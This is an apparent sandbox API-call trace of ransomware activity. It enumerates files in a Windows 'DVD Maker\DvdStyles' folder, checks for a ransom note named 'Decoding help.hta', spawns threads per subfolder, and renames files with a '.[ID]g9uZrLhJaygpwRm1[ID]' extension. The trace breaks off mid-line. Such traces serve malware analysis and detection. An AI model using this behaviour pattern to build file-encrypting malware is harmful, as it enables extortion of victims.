lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.174] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.174] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Full" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" [0053.174] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*.*" [0053.174] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3380118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x32c [0053.190] CloseHandle (hObject=0x32c) returned 1 [0053.190] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Heart_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0053.190] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.190] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.191] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Heart_ButtonGraphic.png") returned -1 [0053.191] lstrlenW (lpString="Heart_ButtonGraphic.png") returned 23 [0053.191] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.191] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.191] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Heart_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" [0053.191] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" [0053.191] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.197] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea2923b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea2923b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="heart_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0053.197] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.197] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.198] lstrcmpiW (lpString1="Decoding help.hta", lpString2="heart_glass_Thumbnail.bmp") returned -1 [0053.198] lstrlenW (lpString="heart_glass_Thumbnail.bmp") returned 25 [0053.198] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="heart_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" [0053.198] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" [0053.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.198] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1278, dwReserved0=0x0, dwReserved1=0x0, cFileName="Heart_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0053.198] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.198] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Heart_SelectionSubpicture.png") returned -1 [0053.198] lstrlenW (lpString="Heart_SelectionSubpicture.png") returned 29 [0053.198] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.198] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Heart_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" [0053.198] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" [0053.198] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.199] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eeebddb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eeebddb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x166e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Heart_VideoInset.png", cAlternateFileName="")) returned 1 [0053.199] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.199] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Heart_VideoInset.png") returned -1 [0053.199] lstrlenW (lpString="Heart_VideoInset.png") returned 20 [0053.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Heart_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" [0053.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" [0053.199] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.199] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HueCycle", cAlternateFileName="")) returned 1 [0053.199] lstrcmpW (lpString1=".", lpString2="HueCycle") returned -1 [0053.199] lstrcmpW (lpString1="..", lpString2="HueCycle") returned -1 [0053.199] lstrcmpiW (lpString1="windows", lpString2="HueCycle") returned 1 [0053.199] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.200] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.200] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="HueCycle" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" [0053.200] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*.*" [0053.200] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111cbcf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.209] CloseHandle (hObject=0x3e0) returned 1 [0053.209] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LayeredTitles", cAlternateFileName="LAYERE~1")) returned 1 [0053.209] lstrcmpW (lpString1=".", lpString2="LayeredTitles") returned -1 [0053.209] lstrcmpW (lpString1="..", lpString2="LayeredTitles") returned -1 [0053.209] lstrcmpiW (lpString1="windows", lpString2="LayeredTitles") returned 1 [0053.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.209] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="LayeredTitles" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" [0053.209] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*.*" [0053.209] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10928730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.213] CloseHandle (hObject=0x3e0) returned 1 [0053.213] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memories", cAlternateFileName="")) returned 1 [0053.217] lstrcmpW (lpString1=".", lpString2="Memories") returned -1 [0053.218] lstrcmpW (lpString1="..", lpString2="Memories") returned -1 [0053.218] lstrcmpiW (lpString1="windows", lpString2="Memories") returned 1 [0053.218] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.218] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Memories" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" [0053.218] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*.*" [0053.218] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115012c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.220] CloseHandle (hObject=0x3e0) returned 1 [0053.220] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e96ab6a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e96ab6a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="menu_style_default_Thumbnail.png", cAlternateFileName="")) returned 1 [0053.220] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.220] lstrcmpiW (lpString1="Decoding help.hta", lpString2="menu_style_default_Thumbnail.png") returned -1 [0053.220] lstrlenW (lpString="menu_style_default_Thumbnail.png") returned 32 [0053.220] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="menu_style_default_Thumbnail.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" [0053.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" [0053.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD 